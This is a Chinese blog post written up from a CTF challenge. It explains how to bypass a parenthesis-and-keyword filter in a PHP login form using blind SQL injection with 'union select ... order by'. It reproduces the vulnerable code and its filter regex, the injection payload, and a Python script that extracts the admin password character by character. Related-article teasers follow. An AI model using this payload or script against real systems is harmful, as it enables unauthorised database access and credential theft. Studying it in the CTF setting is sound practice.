CTF中过滤括号的盲注题小记

最新推荐文章于 2024-08-11 23:54:14 发布
最新推荐文章于 2024-08-11 23:54:14 发布
阅读量4.9k 收藏 5
点赞数 3
分类专栏: CTF

【说在前面的话:这是我做的第一个过滤了括号的盲注题目,看着论坛里很多人都有打CTF,就发出来一起交流一下,还望大神轻喷。文章本来应该归类到CTF的,可惜我发帖数量不够,访问不了。如果发帖不正确也请跟我练习,我会按照要求改动】

解题过程:

题目的代码:

<?php 
// auth:“蓝鲸塔主”
$dbhost = "localhost";
$dbuser = "root";
$dbpass = "root";
$db = "test";
$conn = mysqli_connect($dbhost,$dbuser,$dbpass,$db);
mysqli_set_charset($conn,"utf8");

/* sql

create  table `admin` (
`id` int(10) not null primary key auto_increment,
`username` varchar(20) not null ,
`password` varchar(32) not null
);
*/
function   filter($str){
    $filterlist = "/\(|\)|username|password|where|
      case|when|like|regexp|into|limit|=|for|;/";
    if(preg_match($filterlist,strtolower($str))){
        die("illegal input!");
    }
    return $str;
}
$username = isset($_POST['username'])?
filter($_POST['username']):die("please input username!");
$password = isset($_POST['password'])?
filter($_POST['password']):die("please input password!");
$sql = "select * from admin where  username =
'$username' and password = '$password' ";

$res = $conn -> query($sql);
if($res->num_rows>0){
    $row = $res -> fetch_assoc();
    if($row['id']){
        echo $row['username'];
    }
}else{
    echo "The content in the password column is the flag!";
}
?>

当然这题目不是直接了当地给出代码,而是还有一些前奏,但是和本次要记录的内容无关就省略了。
对给出的代码做审计,发现在最后的内容是:如果查询有结果就显示结果中的username,如果没有就显示最后一行代码。
如果在没有fileter的情况下,可以用union的方法变相取出password。但是在filter中过滤了username和password,所以这里就不能用常规的联合查询或者报错注入,只能用常规的盲注。可是大部分的盲注是需要括号的,但是这里的代码又过滤了括号。
在网上找了一下,发现了union select加上order by的方法:

select * from admin where username='admin' and password='' or 1 union select 1,2,'%s' from admin order by 3 #'

在本地自己搭建环境测试一下:
 



(上图是自己添加的测试数据)
猜测第一个数据:
 



 



 



 




猜测第二个数据:

 



 



 




这里不难看到一个规律,如果猜测的字符如果大于实际字符,那么结果会把实际的结果显示在第一行,否则显示在第二行
基于这个现象,对题目进行尝试:

 



 




这里看到的情况跟我们测试的情况一样,所以正确的字符应该是首次出现“whaleadmin”的上一个字符。
所以我这里写了个py脚本:

 

import requests

url = "http://127.0.0.1/index.php"

alist = "0123456789abcdef"

payload = ""
payload1 = "' or 1 union select 1,2,'"
payload2 = "' from admin order by 3 #"


datas = {"username":"1","password":""}

tmp_OK = ""
tmp = ""
for j in range(0,32):
    for i in alist:
        payload = payload1+tmp_OK+i+payload2
        datas["password"] = payload
        #print datas
        r = requests.post(url=url,data=datas)
        #print r.text
        if "whaleadmin" in r.text:
            tmp_OK += tmp
            print tmp_OK
            break
        if ("2" in r.text) and (i == "f"):
            tmp_OK += i
            print tmp_OK
        tmp = i

 

大方子
关注
专栏目录
CTF从入门到提升(三)基于时间的盲注及部分函数
anquanniu的博客
08-20 1798
本次内容会先介绍一些函数,然后结合一些目进行讲解。这里的基于时间是指延时。 ​​我们对于盲注最早接触的应该就是SLEEP函数, 很多编程语言都有它。函数的特点就是添加延时功能,我们可以看一下它的一个效果是什么样子的。 (在这里我做一个演示,如果大家想看可以到安全牛课堂的视频里看动手操作 CTF从入门到提升 课时3:1分10秒) 举栗子: 在添加了SLEEP函数之后,它的运行结果要是...
CTF】关于SQL盲注的细节
publicStr的博客
11-29 2645
目录: 0x01 CTF关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引号及相关问 0x02 某简单关于order by利用排序布尔盲注目及源码 0x03 某CTF解,盲注+泄露+反序列化       0x01 CTF关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引...
ctfx从入门到放弃:SQL盲注190510
爱党人士
05-11 439
Sql-Inject漏洞-盲注 在有些情况下,后台使用了错误消息屏蔽方法(比如@)屏蔽了报错 此时无法在根据报错信息来进行注入的判断。 这种情况下的注入,称为“盲注” 根据表现形式的不同,盲注又分为based boolean和based time两种类型。 上面的知识要引申出来的一个逻辑是: 既然在盲注情况下,从页面上只能判断1,0的情况,那么我们可以对databae()的结果 截取一个字符...
HPP全局污染实现的sql注入的漏洞
最新发布
qq_64302290的博客
08-11 1122
1:什么是HPP的全局污染?HPP全局污染就是利用了php接收同样的参数是,对参数的处理来实现的一种漏洞。本次漏洞的实现就是利用该特点来实现的。我们利用两个点来实现的:(1):当传入两个参数的时候php会解析第二个参数(2):并且,我们还利用了web在解析 (.) 时会被解析为下划线(_),比如当我们传递一个i.d进入php时会被解析为i_d。
mysql括号过滤_MySQL之数据过滤
weixin_33292780的博客
02-02 679
数据过滤:如何组合WHERE子句以建立功能更强的更高级的搜索条件。还将学习如何使用NOT和IN操作符。1. AND操作符-- AND操作符SELECT vend_id, prod_id, prod_price, prod_nameFROM productsWHERE vend_id = 1003 AND prod_price <= 10;AND: 用在WHERE子句的关键字,用来指示检索满...
[SniperOJ](web) Inject again 注入 过滤左右括号 order by
weixin_30916125的博客
06-14 455
0x00 目概述 目地址:http://web2.sniperoj.cn:10004/ 拿到,尝试注入,发现有过滤。 进行fuzz,发现过滤了 左右括号,分号,等号 ,还有一些查询关键字 。 在username有盲注。 为true时候返回 ‘admin’ 同时目提示flag就为admin的密码。 0X01 自己解思路流程 尝试联合查询 : union...
CTF-时间盲注
黎先生的博客
10-20 691
基于时间的盲注 sleep 1.配合if条件触发 IF() select if(1,2,3) substr(str, position, len) substring(str, position, len) == substring(str FROM position FOR len) substring_index(被截取的字段, 关键字, 关键字出现的次数) select * from us...
ctfCTF理论考核及答案
07-05
1. **文件扩展名**:文件扩展名是标识文件类型的重要部分,例如在`readme.txt`,`.txt`是扩展名,它告诉操作系统如何处理这个文件。选项C是正确答案。 2. **HTML语言**:HTML(HyperText Markup Language)是一种...
CTF库超详细资源合集
06-14
在传统的CTF线上⽐赛,Web类⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web类⽬常见的漏洞类型...
CTFSQL盲注.py
11-25
CTF有时会用到盲注,这是一段SQL盲注代码,运行于python37环境,多个字段信息提取的句子已注释保存。
CTF100.docx
05-25
在解模式CTF赛制,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战目的分值和时间来排名,通常用于在线选拔赛。目主要包含逆向、...
CTF-时间盲注
PolarPeak的博客
04-25 2681
文章目录参考时间盲注Heavy QueryGet_lock()Rlikesleep2019hgame-week3-sqli2 `sleep`benchmarkpwnhub全宇宙最最简单的PHP博客系统 `Get_lock() Heavy Query` 参考 时间盲注 Heavy Query 个人认为这个方法是本的最优解 原理就如方法的名字:大负荷查询 即用到一些消耗资源的方式让数据库的查询时间尽量变长 而消耗数据库资源的最有效的方式就是让两个大表做笛卡尔积,这样就可以让数据库的查询慢下来 而最后找到系统
CTFHub(布尔盲注 判断是否,无回显)
sGanYu
08-06 2071
盲注主要分为两种,一种为时间类型盲注,一种为布尔类型盲注 判断是否是布尔类型的:当一个界面存在注入,但是没有显示位,没有SQL语句执行错误信息,由于布尔类型的注入只会告知是或者不是,所以只能通过页面返回的对与错来进行一个SQL的注入 【 column_name:列的名称 Information_schema.columns:表示所有的列的信息 Information_schema:表示所有信息,包括库、表、列 Information_schema.tables:表示所有的表的信息 tabl
[BUUCTF-pwn] wdb_2018_1st_EasyCoin
weixin_52640415的博客
01-20 1956
原版的exp是这网鼎杯-EasyCoin | e3pem's Blog 看了半天好不容易弄明白。 漏洞点有两个,第1个比较容易,登录后输入4个字符不在菜单里的就直接printf,不过就4位也干不了嘛。把0-9都试一遍找到3和9分别是libc.write+0x10和heap_base+0x10也算是有用 default: printf("[-] Unknown Command: "); printf(buf); ..
HITCTF2018-web全
蚁景网安学院
02-07 2982
点击蓝字关注我们前记最近参加了一下哈工大办的HITCTF,感觉目可以学到知识,于是分享一下我的解~01PHPreading发现文件泄露http://198.13.58.35:8899...
BUUCTF-PWN刷记录-15
weixin_44145820的博客
04-29 735
目录0ctf_2016_warmup(ROP,利用alarm修改eax)SWPUCTF_2019_login(格式化字符串漏洞,字符串位于bss) 0ctf_2016_warmup(ROP,利用alarm修改eax) 不能执行shellcode 有一个缓冲区溢出 由于NX保护,我们只能考虑ROP 这里有一个小技巧,就是alarm函数 程序开始调用了alarm 如果我们之后再次调用alarm,...
SSTI模板注入-括号、args、单双引号被过滤绕过(ctfshow web入门365)
T1ngSh0w的博客
03-28 1755
SSTI模板注入漏洞——括号、单双引号、args被过滤ctfshow web入门365
黑马python2019吾爱破解_2019KCTF 南充茶坊(python逆向)
weixin_39538847的博客
12-19 520
1.前言本文讲的是一道python逆向,逆向分析python打包程序,首先对它进行解压缩,使用python逆向工具提取出关键py文件,分析py文件的算法,然后写出求解flag的代码。2.工具1.x64dbg3.pyinstaller4.3.解过程1.选该软件,右键发现可以解压缩,用binwalk工具发现南充茶馆.exe里面有压缩文件,解压缩后有CM.exe和aplib.dll,用binwa...
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1355
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和将名额总是和自己无缘。废话不多说,直接看wp。   所有目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程提供的做环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   目是常规的堆,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值